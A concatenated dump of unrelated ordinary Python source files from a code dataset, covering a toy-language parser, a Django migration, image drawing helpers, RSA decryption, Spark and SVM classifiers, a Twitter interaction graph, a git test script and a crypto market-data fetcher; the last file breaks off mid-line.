self.lexer.next_tok()\n if self.lexer.sym != Lexer.ID: # должна быть переменная\n self.error('variable expected!')\n\n ident = self.lexer.ident\n\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.COLON: # должно быть двоеточие\n self.error('\":\" expected')\n self.lexer.next_tok()\n if self.lexer.sym not in (Lexer.INT, Lexer.STR, Lexer.ARR): # тип переменной - integer, string, array\n self.error('variable type expected')\n\n self.makevar(ident, self.level)\n\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.SEMICOLON: # и вишенка на торте\n self.error('\";\" expected')\n\n # ФУНКЦИИ\n elif self.lexer.sym == Lexer.FUNC:\n self.levels += 1 # Нашел функцию - общее количество уровней увеличилось\n\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.ID:\n self.error('function name expected')\n fname = self.lexer.ident\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.LPAR:\n self.error('\"(\" expected')\n self.lexer.next_tok()\n pcounter = 0\n pargs = []\n # 
просто пустые параметры, их нет\n if self.lexer.sym != Lexer.ID:\n if self.lexer.sym != Lexer.RPAR:\n self.error('\")\" expected')\n else:\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.COLON:\n self.error('\":\" expected')\n self.lexer.next_tok()\n if self.lexer.sym not in (Lexer.INT, Lexer.STR, Lexer.ARR):\n self.error('function type expected')\n # ЗАНЕСЕНИЕ ФУНКЦИИ В ТАБЛИЦУ КАК ПЕРЕМЕННОЙ\n self.level = self.levels - 1\n self.makevar(fname, 0, pcounter, params=pargs)\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.SEMICOLON:\n self.error('\";\" expected')\n else: # если нашел параметр\n # ФУНКЦИИ С ПАРАМЕТРАМИ\n pident = self.lexer.ident # ID пепвой переменной\n self.makevar(pident, self.levels - 1) # создаем новый уровень видимости\n pargs.append(pident)\n # Функция - это statement?\n self.lexer.next_tok()\n if self.lexer.sym == Lexer.COMMA: # если запятая\n pcounter = 1\n self.lexer.next_tok() # следом доджна быть еще переменная\n while (True): # ИНИЦИАЛИЩАЦИЯ ПАРАМЕТРОВ ФУНКЦИИ (ДО 4х)\n pident = self.lexer.ident\n pargs.append(pident)\n self.makevar(pident, self.levels - 1) # заводим переменную\n pcounter += 1\n self.lexer.next_tok()\n if self.lexer.sym == Lexer.COMMA: # если опяь запятая\n self.lexer.next_tok()\n else:\n break\n if pcounter > 4: # чтобы не иметь дел со стеком\n self.error('Maximum 4 parameters allowed')\n if self.lexer.sym != Lexer.RPAR:\n self.error('\")\" expected')\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.COLON: # ТИП ФУНКЦИИ\n self.error('\":\" expected')\n self.lexer.next_tok()\n if self.lexer.sym not in (Lexer.INT, Lexer.STR, Lexer.ARR):\n self.error('function type expected')\n # ЗАНЕСЕНИЕ ФУНКЦИИ В ТАБЛИЦУ КАК ПЕРЕМЕННОЙ\n self.level = self.levels - 1\n self.makevar(fname, 0, pcounter, pargs)\n self.lexer.next_tok()\n if self.lexer.sym != Lexer.SEMICOLON:\n self.error('\";\" expected')\n # Тело функции\n self.lexer.next_tok()\n\n n = Node(Lexer.FUNC, op1=n, op2=self.statement(), level=self.level, name=fname) # вызываем функцию\n self.level = 0\n self.funcount += 1\n\n elif self.lexer.sym == Lexer.BEGIN: # обработка начала-конца\n n = Node(Lexer.MAIN, op1=n, op2=self.statement(), level=self.level)\n if self.lexer.sym == Lexer.DOT:\n self.lexer.next_tok()\n return n\n else:\n print(\"Got %s\" % self.lexer.sym)\n n = Node(self.lexer.EMPTY)\n self.error('statement error')\n self.lexer.next_tok()\n return n\n\n # Функция парсинга\n def parse(self):\n self.lexer.next_tok()\n node = Node(Lexer.PROG, op1=self.compound_statement(), level=self.level)\n if (self.lexer.sym != Lexer.EOF):\n self.error(\"Invalid statement syntax\")\n return node\n\n # Функция вывода таблицы\n def print_table(self):\n for i in range(self.levels):\n print(\"LEVEL \", i)\n if self.table[i] == {}:\n print(\"EMPTY\")\n else:\n tt = self.table[i]\n for x in tt:\n t = self.table[i].get(x)\n vt = \"INTEGER\"\n if t.vtype == 1:\n vt = \"STRING\"\n elif t.vtype == 2:\n vt = \"ARRAY\"\n s = ''\n if t.fargs != None:\n s = \"args: \" + str(t.fargs)\n print(\"%16s: level = %s, vtype = %s, value = %s, size = %s, %s\" %\n (x, t.level, vt, t.value, t.size, s))\n\n\n# Вывод дерева\ndef printer(node, n):\n s = \"\"\n if node != None:\n if n > 1:\n s += \"|\"\n s += \" \" * n\n if n > 1:\n s += \"=>\"\n s2 = ''\n if node.name != '':\n s2 = 'name: ' + node.name\n print(\"%s kind: %s value: %s %s\" % (s, node.kind, node.value, s2))\n printer(node.op1, n + 3)\n printer(node.op2, n + 3)\n printer(node.op3, n + 
3)\n\n","sub_path":"new_parser.py","file_name":"new_parser.py","file_ext":"py","file_size_in_byte":23280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"596752749","text":"from __future__ import unicode_literals\nfrom django.db import migrations, models\nfrom slugify import UniqueSlugify\n\n\ndef addCustom(apps, schema_editor):\n\n ExistingRecords = apps.get_model('schema', 'cameramodel')\n\n custom_slugify_unique = UniqueSlugify(to_lower=True)\n\n for record in ExistingRecords.objects.all():\n record.slug = custom_slugify_unique(\"{} {} {}\".format(\n record.manufacturer.name, record.model, str(record.disambiguation or '')))\n record.save()\n\n\nclass Migration(migrations.Migration):\n dependencies = [\n ('schema', '0035_cameramodel_slug'),\n ]\n operations = [\n migrations.RunPython(\n addCustom, reverse_code=migrations.RunPython.noop),\n ]\n","sub_path":"schema/migrations/0036_cameramodel_slug.py","file_name":"0036_cameramodel_slug.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"146717519","text":"import os.path as osp\n\nimport matplotlib\nimport numpy as np\nimport PIL.Image\nimport PIL.ImageDraw\nimport PIL.ImageFont\n\n\ndef rectangle(src, aabb1, aabb2, color, fill=None, width=0):\n '''Draw rectangle on numpy array with Pillow.\n\n Parameters\n ----------\n src: numpy.ndarray\n Input image.\n aabb1, aabb2: (2,) array-like\n aabb1 is (y_min, x_min) and aabb2 is (y_max, x_max).\n color: (3,) array-like\n RGB color in uint8.\n fill: (3,) array-like, optional\n RGB color to fill the rectangle. None for no fill. (default: None)\n width: int, optional\n Rectangle line width. (default: 0)\n\n Returns\n -------\n dst: numpy.ndarray\n Output image.\n '''\n color = tuple(color)\n if fill is not None:\n fill = tuple(fill)\n\n src_pil = PIL.Image.fromarray(src)\n draw = PIL.ImageDraw.ImageDraw(src_pil)\n\n y1, x1 = aabb1\n y2, x2 = aabb2\n draw.rectangle(xy=(x1, y1, x2, y2), fill=fill, outline=color, width=width)\n\n dst = np.asarray(src_pil)\n return dst\n\n\ndef _get_font(size):\n fonts_path = osp.join(\n osp.dirname(matplotlib.__file__), 'mpl-data/fonts/ttf'\n )\n font_path = osp.join(fonts_path, 'DejaVuSans.ttf')\n font = PIL.ImageFont.truetype(font=font_path, size=size)\n return font\n\n\ndef text_size(text, size):\n '''Get text size (height and width).\n\n Parameters\n ----------\n text: str\n Text.\n size: int\n Pixel font size.\n\n Returns\n -------\n height: int\n Text height.\n width: int\n Text width.\n '''\n font = _get_font(size)\n width, height = font.getsize(text)\n return height, width\n\n\ndef text(src, yx, text, size, color=(0, 0, 0)):\n '''Draw text on numpy array with Pillow.\n\n Parameters\n ----------\n src: numpy.ndarray\n Input image.\n yx: (2,) array-like\n Left top point of the text.\n text: str\n Text to draw.\n size: int\n Text size in pixel.\n color: (3,) array-like\n Text RGB color in uint8.\n Default is (0, 0, 0), which is black.\n\n Returns\n -------\n dst: numpy.ndarray\n Output image.\n '''\n src_pil = PIL.Image.fromarray(src)\n draw = PIL.ImageDraw.ImageDraw(src_pil)\n\n y1, x1 = yx\n color = tuple(color)\n font = _get_font(size=size)\n draw.text(xy=(x1, y1), text=text, fill=color, font=font)\n\n dst = np.asarray(src_pil)\n return dst\n\n\ndef text_in_rectangle(src, loc, text, size, background, color=(0, 0, 0)):\n '''Draw text in a rectangle.\n\n Parameters\n ----------\n src: numpy.ndarray\n Input 
image.\n loc: str\n Location of text. It must be one of following: lt, rt, lb, or rb.\n text: str\n Text to draw.\n size: int\n Text size in pixel.\n background: (3,) array-like\n Background color in uint8.\n color: (3,) array-like\n Text RGB color in uint8.\n Default is (0, 0, 0), which is black.\n\n Returns\n -------\n dst: numpy.ndarray\n Output image.\n '''\n\n tsize = text_size(text, size)\n\n height, width = src.shape[:2]\n if loc == 'lt':\n yx = (0, 0)\n elif loc == 'rt':\n yx = (0, (width - 1) - tsize[1] - 1)\n elif loc == 'lb':\n yx = ((height - 1) - tsize[0] - 1, 0)\n elif loc == 'rb':\n yx = ((height - 1) - tsize[0] - 1, (width - 1) - tsize[1] - 1)\n else:\n raise ValueError('unsupported loc: {}'.format(loc))\n\n dst = rectangle(\n src=src,\n aabb1=(yx[0], yx[1]),\n aabb2=(yx[0] + tsize[0] + 1, yx[1] + tsize[1] + 1),\n color=background,\n fill=background,\n )\n dst = globals()['text'](\n src=dst,\n yx=(yx[0] + 1, yx[1] + 1),\n text=text,\n color=color,\n size=size,\n )\n return dst\n","sub_path":"imgviz/draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":3765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"514906520","text":"import rsa\nimport binascii\nwith open('Private.pem',mode='rb') as privatefile:\n keydata=privatefile.read()\nprint(keydata)\nprikey=rsa.PrivateKey.load_pkcs1(keydata)\n\nprint(prikey)\nmimi=('D6HtGLK8/HWpHCEGrYrJ6j2OYZO7GbCeFWsuMZU510RrNop9EAvwcaE8BgaxvJGL2wkmYDdPK+vCFKfDg3pDQYaJC5HBDwI4'\n 'Pg6Y52d+3BC+b8f4Cm/'\n 'URZ4Ygm11nWAN73w6s679EFKt4XKRooE8r5X4UtfL+dV/FxEXoGOZ5qA=')\nprint(binascii.a2b_base64(mimi))\nmessage=rsa.decrypt(binascii.a2b_base64(mimi),prikey)\nprint(str(message,encoding='UTF-8'))\nprint(str(message,encoding='UTF-8')=='This is a test!')","sub_path":"Flask+Gevent/rsaPorject.py","file_name":"rsaPorject.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"111036218","text":"from pyspark.ml import Pipeline\nfrom pyspark.ml.classification import RandomForestClassifier\nfrom pyspark.ml.evaluation import BinaryClassificationEvaluator\nfrom pyspark.ml.feature import *\nfrom pyspark.ml.tuning import ParamGridBuilder, CrossValidator\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import *\n\n\ndef main():\n spark = SparkSession.builder.master(\"local[2]\").getOrCreate()\n df = spark.read.option(\"header\", \"true\").option(\"inferSchema\", \"true\").csv(\"data/train.csv\"). \\\n withColumnRenamed(\"Survived\", \"label\")\n avg_age = df.agg(mean(\"Age\").alias(\"avg\")).collect()[0][\"avg\"]\n na_map = {\"Age\": avg_age, \"Sex\": \"male\", \"Embarked\": \"S\", \"Fare\": 0.0, \"SibSp\": 0.0}\n df = df.na.fill(na_map)\n sex_indexer = StringIndexer().setInputCol(value=\"Sex\").setOutputCol(\"sex_index\")\n embarked_indexer = StringIndexer().setInputCol(\"Embarked\").setOutputCol(\"embarked_index\")\n vector_assembler = VectorAssembler().setInputCols([\"sex_index\", \"embarked_index\", \"Fare\", \"SibSp\", \"Age\"]). \\\n setOutputCol(\"features\")\n classifier = RandomForestClassifier().setFeaturesCol(\"features\")\n\n pipeline = Pipeline().setStages([sex_indexer, embarked_indexer, vector_assembler, classifier])\n\n grid = ParamGridBuilder().addGrid(classifier.maxDepth, [5, 8]). 
\\\n addGrid(classifier.maxBins, [16, 32]).build()\n\n crossval = CrossValidator(estimator=pipeline,\n estimatorParamMaps=grid,\n evaluator=BinaryClassificationEvaluator(),\n numFolds=3)\n\n cv_model = crossval.fit(df)\n\n test_df = spark.read.option(\"header\", \"true\").option(\"inferSchema\", \"true\").csv(\"data/test.csv\").fillna(na_map)\n cv_model.transform(test_df). \\\n select(\"PassengerId\", \"prediction\"). \\\n show()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"spark_ml/spark_ml_demo.py","file_name":"spark_ml_demo.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"300874582","text":"#!/usr/bin/python\n'''\n -------------------------------\n Script Name : ipush_test.py\n Usage : testing ipush by cloning lsv branch\n Modules Used : os,commands,subprocess\n Developer : Trupti\n Version :\n Created On : 05-04-2015\n Modified On :\n Update : updated for both SJ hub and GOT hub\n\tLog file : ipush_output.txt log will be stored in current directory\n -----------------------------------\n'''\nimport sys\nimport os\nimport commands\nimport subprocess\n\nxid = commands.getoutput('whoami')\npath = os.getcwd()\nlog_file = path + '/ipush_output.txt'\nif os.path.isfile(log_file):\n\tos.system('rm -rf '+log_file)\nscratch_space_sj = commands.getoutput('ls -d /scratch/[0-9][0-9][0-9]/'+xid)\nscratch_sj =scratch_space_sj.split(\"\\n\")[0]\n\ndir_name = str(raw_input(\"Enter a directory name to be created..\"))\nscratch_space_got= '/workspace/scratch/'+xid\n\nif os.path.exists(dir_name):\n os.system('rm -rf '+ dir_name)\nos.mkdir(dir_name)\n\nos.chdir(dir_name)\ncmd = \"/tools/swdev/bin/authclone ipos -b lsv 2>&1|tee -a \" + log_file\n#os.system(cmd)\n\nos.chdir('ipos')\nwith open('pkt/sw/se/xc/bsd/routing/ipmulticast/pim/src/pim_mcastmgr_ipc.c','a') as fp:\n fp.write('/*----------------------*/')\nos.system('git add pkt/sw/se/xc/bsd/routing/ipmulticast/pim/src/pim_mcastmgr_ipc.c')\nos.system('git commit -m \"Bug ids: 235336\\nReviewers: eanknem ejiawen\\nTargets Built: ASG\\nUnit Test Suites run: none\\nAffected Modules: none\\nDummy commit message.\"')\n\nif os.path.exists(scratch_space_got):\n\tif os.path.exists(scratch_space_got+'/'+dir_name):\n\t\tos.system('rm -rf ' +scratch_space_got+'/'+dir_name)\n\telse: \n\t\tos.system('scratch-config '+ scratch_space_got+'/'+ dir_name +'/')\nelif os.path.exists(scratch_sj):\n\tif os.path.exists(scratch_sj+'/'+dir_name):\n\t\tos.system('rm -rf ' +scratch_sj+'/'+dir_name)\n\telse:\n\t os.system('export PATH=/tools/swdev/bin:$PATH')\n\t os.system('scratch-config '+ scratch_sj+'/'+dir_name+'/')\n#os.system('git ipush 2>&1|tee -a '+ log_file)\n\n","sub_path":"work/iPush/demo_ipush_test.py","file_name":"demo_ipush_test.py","file_ext":"py","file_size_in_byte":2018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"224271950","text":"import numpy as np\nimport pandas as pd\n\nfrom time import time\nfrom functools import wraps\nfrom collections import Counter\n\nfrom sklearn import svm\nfrom sklearn.model_selection import train_test_split\n\n\n###\n\n\ndef print_duration(start, end):\n ''' Display the duration of an execution in the format -> 00:00:00.00\n ----------\n PARAMETERS\n - start, end: time.time() object representing CPU time at a certain moment\n ----------\n RETURNS\n - None\n\n '''\n hours, rem = divmod(end - start, 3600)\n minutes, seconds = divmod(rem, 60)\n 
print(\"{:0>2}:{:0>2}:{:05.2f}\\n\".format(int(hours), int(minutes), seconds))\n\n\ndef timing(f):\n ''' Decorator used to claculate the time used to compute a function\n ----------\n PARAMETERS\n - f: executable function\n ----------\n RETURNS\n - returns a wrapper for time calculation for the function f\n\n '''\n @wraps(f)\n def wrapper(*args, **kwargs):\n start = time()\n result = f(*args, **kwargs)\n end = time()\n # Display the elapsed time in pretty format -> 00:00:00.00\n print(f\"Elapsed time for {f.__name__}(): \", end = \"\")\n print_duration(start, end)\n\n return result\n\n return wrapper\n\n\n@timing\ndef read_data(data_path):\n ''' Read a .csv file from the specified path\n ----------\n PARAMETERS\n - data_path: string with the name of the file to be read\n\n (notice that data_path only contains the name of the file, and thus the file\n must be located in the same directory as this 'histogram_svm.py' script)\n ----------\n RETURNS\n - a pd.DataFrame with the representation of the data\n\n '''\n # Specify dtypes and column names\n length = int(data_path.split('.')[0][2:])**2\n dtypes = {'pixel-' + str(i): 'uint8' for i in range(1, length +1)}\n dtypes.update({'label' : 'category'})\n colnames = list(dtypes.keys())\n\n print('-' * 60)\n print(f\"Reading {data_path}...\")\n data = pd.read_csv(\n data_path, header = None, names = colnames, dtype = dtypes\n )\n # Output some metrics of the data file\n print(f\"train.cv file has {data.shape[0]} rows and {data.shape[1]} columns\")\n print(f\"Memory usage: {round(data.memory_usage().sum() / 1024**2, 3)} Mb\")\n print('-' * 60)\n \n return data\n\n\n###\n\n\nif __name__ == '__main__':\n\n print(f'Radial-basis kernel SVM for the 64x64 lego pieces dataset:')\n\n df = read_data('df64.csv')\n # Split the target (label) from data\n Y = np.array(df.label)\n df = df.drop(columns = ['label'])\n\n # Convert data to a numpy ndarray\n X = np.array(df).astype('uint8')\n\n # Train and test splitting\n x_train, x_test, y_train, y_test = train_test_split(\n X, Y, shuffle = True, stratify = Y, train_size = .5,\n test_size = .2, random_state = 347\n )\n\n ###\n # Fit the SVM\n ###\n\n # Initialize an instance of a histogram-kernel SVM with specified L\n cvf = svm.SVC(kernel = 'rbf', gamma = 'scale')\n\n print('-' * 60)\n\n print('Fitting the SVM with training data...')\n start = time()\n # Train the SVM with the training samples\n cvf.fit(x_train, y_train)\n end = time()\n print('Elapsed time for training the SVM: ', end = '')\n print_duration(start, end)\n\n \n print('Predicting test values...')\n start = time()\n # Predict on the test set\n test_predictions = cvf.predict(x_test)\n end = time()\n print('Elapsed time for predicting on test data: ', end = '')\n print_duration(start, end)\n\n print()\n print('-' * 60)\n # Output the accuracy on the test set\n print(f\"Test accuracy: {sum(test_predictions == y_test) / len(y_test)}\")\n\n\n\n","sub_path":"radial_svm.py","file_name":"radial_svm.py","file_ext":"py","file_size_in_byte":3639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"607183163","text":"# -*- coding: utf-8 -*-\n\"\"\"\n.. 
See the NOTICE file distributed with this work for additional information\n regarding copyright ownership.\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n http://www.apache.org/licenses/LICENSE-2.0\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\n\nimport logging\n\nfrom bio.ensembl.ontology.hive.OLSHiveLoader import OLSHiveLoader\nfrom bio.ensembl.ontology.loader.db import dal\nfrom bio.ensembl.ontology.loader.models import Ontology, Term, Relation, RelationType, get_one_or_create\n\nlogger = logging.getLogger(__name__)\n\n\nclass OLSLoadPhiBaseIdentifier(OLSHiveLoader):\n\n def run(self):\n self.input_job.transient_error = False\n logger.info('Loading PHIBASe Identifier terms')\n with dal.session_scope() as session:\n # delete phi-base-identifier namespaces ontology\n if self.param_required('_start_term_index') == 0:\n # only delete for first chunk\n ontologies = session.query(Ontology).filter_by(name='phi', namespace='phibase_identifier').all()\n for ontology in ontologies:\n logger.info('Deleting namespaced ontology %s - %s', ontology.name, ontology.namespace)\n rel = session.query(Relation).filter_by(ontology=ontology).delete()\n logger.info('Wiped %s Relations', rel)\n res = session.query(Term).filter_by(ontology=ontology).delete()\n logger.info('Wiped %s Terms', res)\n logger.debug('...Done')\n m_ontology, created = get_one_or_create(Ontology, session,\n name='phi',\n namespace='phibase_identifier',\n create_method_kwargs=dict(\n version='1.0',\n title='PHI-base Identifiers')\n )\n relation_type, created = get_one_or_create(RelationType,\n session,\n name='is_a')\n for i in range(self.param_required('_start_term_index'), self.param_required('_end_term_index') + 1):\n accession = 'PHI:{}'.format(i)\n term = Term(accession=accession, name='{}'.format(i))\n if i == 0:\n term.name = 'phibase identifier'\n term.is_root = 1\n m_related = term\n else:\n m_related = session.query(Term).filter_by(accession='PHI:0').one()\n logger.debug('Adding Term %s', accession)\n session.add(term)\n m_ontology.terms.append(term)\n if i != 0:\n term.add_parent_relation(m_related, relation_type, session)\n else:\n m_related = term\n if i % 100 == 0:\n logger.info('Committing transaction')\n session.commit()\n\n def write_output(self):\n logger.info('Ontology %s done...', self.param_required('ontology_name'))\n","sub_path":"bio/ensembl/ontology/hive/OLSLoadPhiBaseIdentifier.py","file_name":"OLSLoadPhiBaseIdentifier.py","file_ext":"py","file_size_in_byte":3691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"262130553","text":"import pandas as pd\nimport numpy as np\nfrom scipy import stats\nfrom operator import itemgetter\nimport re\nimport json\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport networkx as nx\nimport pymongo\n\nfrom wordcloud import WordCloud\n\nclient = pymongo.MongoClient('localhost', 27017)\ndb = client.TwitterStream\ntweets = db.all_tweets\n\n\n# Get the information about user\ndef get_users(tweets_final):\n print(\"Getting users...\")\n tweets_final[\"screen_name\"] = tweets_df['user.screen_name']\n 
tweets_final[\"user_id\"] = tweets_df[\"user.id\"]\n tweets_final[\"followers_count\"] = tweets_df[\"user.followers_count\"]\n return tweets_final\n\n\n# Get the user mentions\ndef get_usermentions(tweets_final):\n print(\"Getting User Mentions...\")\n # Inside the tag 'entities' will find 'user mentions' and will get 'screen name' and 'id'\n if not tweets_df['entities.user_mentions'].empty:\n tweets_final[\"user_mentions_screen_name\"] = tweets_df['entities.user_mentions'][0][0]['screen_name']\n tweets_final[\"user_mentions_id\"] = tweets_df['entities.user_mentions'][0][0][\"id_str\"]\n return tweets_final\n\n\n# Get retweets\ndef get_retweets(tweets_final):\n print(\"Getting Retweets...\")\n # Inside the tag 'retweeted_status' will find 'user' and will get 'screen name' and 'id'\n tweets_final[\"retweeted_screen_name\"] = tweets_df[\"retweeted_status.user.screen_name\"]\n tweets_final[\"retweeted_id\"] = tweets_df[\"retweeted_status.user.id_str\"]\n return tweets_final\n\n\n# Get quoted tweets\ndef get_quoted(tweets_final):\n print(\"Getting Quoted Tweets...\")\n # Inside the tag 'retweeted_status' will find 'user' and will get 'screen name' and 'id'\n tweets_final[\"quoted_screen_name\"] = tweets_df[\"quoted_status.user.screen_name\"]\n tweets_final[\"quoted_id\"] = tweets_df[\"quoted_status.user.id_str\"]\n return tweets_final\n\n\n# Get the interactions between the different users\ndef get_interactions(row):\n # From every row of the original dataframe\n # First we obtain the 'user_id' and 'screen_name'\n user = row[\"user_id\"], row[\"screen_name\"]\n # Be careful if there is no user id\n if user[0] is None:\n return (None, None), []\n\n # The interactions are going to be a set of tuples\n interactions = set()\n\n # Add Mentions\n interactions.add((row[\"user_mentions_id\"], row[\"user_mentions_screen_name\"]))\n # Add Retweets\n interactions.add((row[\"retweeted_id\"], row[\"retweeted_screen_name\"]))\n # Add replies\n interactions.add((row[\"in_reply_to_user_id\"], row[\"in_reply_to_screen_name\"]))\n # Add quotes\n interactions.add((row[\"quoted_id\"], row[\"quoted_screen_name\"]))\n\n # Discard if user id is in interactions\n interactions.discard((row[\"user_id\"], row[\"screen_name\"]))\n # Discard all not existing values\n interactions.discard((None, None))\n # Return user and interactions\n return user, interactions\n\n\n# Get the information about replies\ndef get_reply(tweets_final):\n # Just copy the 'in_reply' columns to the new dataframe\n tweets_final[\"in_reply_to_screen_name\"] = tweets_df[\"in_reply_to_screen_name\"]\n tweets_final[\"in_reply_to_status_id\"] = tweets_df[\"in_reply_to_status_id\"]\n tweets_final[\"in_reply_to_user_id\"] = tweets_df[\"in_reply_to_user_id\"]\n return tweets_final\n\n\n# Lastly fill the new dataframe with the important information\ndef fill_df(tweets_final):\n tweets_final = get_users(tweets_final)\n tweets_final = get_usermentions(tweets_final)\n tweets_final = get_retweets(tweets_final)\n tweets_final = get_reply(tweets_final)\n tweets_final = get_quoted(tweets_final)\n return tweets_final\n\n\n\n\nif __name__ == \"__main__\":\n pd.set_option('display.float_format', lambda x: '%.f' % x)\n print(\"Getting Database And Flattening...\")\n tweets_df = pd.json_normalize(tweets.find({}).limit(500), max_level=2)\n\n print(list(tweets_df.columns))\n # Create a second dataframe to put important information\n tweets_final = pd.DataFrame(\n columns=[\"created_at\", \"id\", \"in_reply_to_screen_name\", \"in_reply_to_status_id\", 
\"in_reply_to_user_id\",\n \"retweeted_id\", \"retweeted_screen_name\", \"user_mentions_screen_name\", \"user_mentions_id\",\n \"text\", \"user_id\", \"screen_name\", \"followers_count\"])\n\n # Columns that are going to be the same\n equal_columns = [\"created_at\", \"id\", \"text\"]\n tweets_final[equal_columns] = tweets_df[equal_columns]\n\n tweets_final = fill_df(tweets_final)\n\n tweets_final = tweets_final.where((pd.notnull(tweets_final)), None)\n\n graph = nx.Graph()\n\n print(\"Getting Interactions....\")\n\n for index, tweet in tweets_final.iterrows():\n user, interactions = get_interactions(tweet)\n user_id, user_name = user\n tweet_id = tweet[\"id\"]\n # tweet_sent = tweet[\"sentiment\"]\n for interaction in interactions:\n int_id, int_name = interaction\n\n graph.add_edge(user_id, int_id, tweet_id=tweet_id)\n\n graph.nodes()[user_id][\"name\"] = user_name\n graph.nodes()[int_id][\"name\"] = int_name\n\n print(\"Graph Data...\")\n\n print(f\"There are {graph.number_of_nodes()} nodes and {graph.number_of_edges()} edges present in the Graph\")\n\n degrees = [val for (node, val) in graph.degree()]\n print(f\"The maximum degree of the Graph is {np.max(degrees)}\")\n print(f\"The minimum degree of the Graph is {np.min(degrees)}\")\n print(f\"The average degree of the nodes in the Graph is {np.mean(degrees):.1f}\")\n print(f\"The most frequent degree of the nodes found in the Graph is {stats.mode(degrees)[0][0]}\")\n\n if nx.is_connected(graph):\n print(\"The graph is connected\")\n else:\n print(\"The graph is not connected\")\n\n print(f\"There are {nx.number_connected_components(graph)} connected components in the Graph\")\n\n print(\"Drawing Graph...\")\n pos = nx.spring_layout(graph, k=0.15)\n plt.figure()\n nx.draw(graph, pos=pos, edge_color=\"black\", linewidths=0.05,\n node_size=4, alpha=0.6, with_labels=False)\n nx.draw_networkx_nodes(graph, pos=pos, node_size=5, node_color=range(graph.number_of_nodes()), cmap='Blues')\n plt.savefig('all_Interactions.png')\n plt.show()\n","sub_path":"interactions.py","file_name":"interactions.py","file_ext":"py","file_size_in_byte":6172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"181477257","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('events', '0002_auto_20151007_1523'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='rhizomeevent',\n options={'verbose_name': 'Rhizome Event', 'verbose_name_plural': 'Rhizome Events'},\n ),\n migrations.AddField(\n model_name='rhizomeevent',\n name='curator_other',\n field=models.TextField(help_text='If no rhizome user or cannot create user account, like for an organization.', max_length=200, null=True, verbose_name='Other Curator', blank=True),\n ),\n migrations.AddField(\n model_name='rhizomeevent',\n name='curator_other_link',\n field=models.URLField(null=True, blank=True),\n ),\n migrations.AddField(\n model_name='rhizomeevent',\n name='tickets_link',\n field=models.URLField(null=True, blank=True),\n ),\n migrations.RemoveField(\n model_name='rhizomeevent',\n name='curator',\n ),\n migrations.AddField(\n model_name='rhizomeevent',\n name='curator',\n field=models.ManyToManyField(related_name='event_curator', null=True, to=settings.AUTH_USER_MODEL, blank=True),\n ),\n 
]\n","sub_path":"rhizome/events/migrations/0003_auto_20151007_1535.py","file_name":"0003_auto_20151007_1535.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"424029636","text":"'''\n三数之和\n'''\n\n\nclass Solution(object):\n def threeSum(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[List[int]]\n \"\"\"\n sortnums = nums.sort()\n return sortnums\n\nif __name__ == '__main__':\n nums = [1, 2, -1, -3, 0]\n print(nums)\n solu = Solution()\n s = solu.threeSum(nums)\n # solu = Solution.threeSum(nums)\n print(s)\n print(nums)","sub_path":"Day01/SumThreeNumber.py","file_name":"SumThreeNumber.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"138101456","text":"import json\nimport requests\nfrom datetime import datetime\n\ncurrency = 'INR'\n\nglobal_url='https://api.coinmarketcap.com/v2/global/?convert=' + currency\n\nrequest = requests.get(global_url)\nresults = request.json()\n\nprint(json.dumps(results,sort_keys=True,indent=4))\n\n\nactive_currencies = results['data']['active_cryptocurrencies']\nactive_markets = results['data']['active_markets']\nbitcoin_percentage = results['data']['bitcoin_percentage_of_market_cap']\nlast_updated = results['data']['last_updated']\nglobal_cap = int(results['data']['quotes'][currency]['total_market_cap'])\nglobal_volume = int(results['data']['quotes'][currency]['total_volume_24h'])\n\n\nactive_currencies_string='{:,}'.format(active_currencies)\nactive_markets_strings = '{:,}'.format(active_markets)\nglobal_cap_strings = '{:,}'.format(global_cap)\nglobal_volume_strings = '{:,}'.format(global_volume)\nlast_updated_strings = datetime.fromtimestamp(last_updated).strftime('%B %d,%Y at %I:%M%p')\n\nprint()\nprint('there are currently ' +str(active_currencies_string) +'active_cryptocurrencies and' +str(active_markets_strings)+ 'active_markets')\nprint('global cap of all crypto is ' + str(global_cap_strings) + ' and 24h global vloume is' 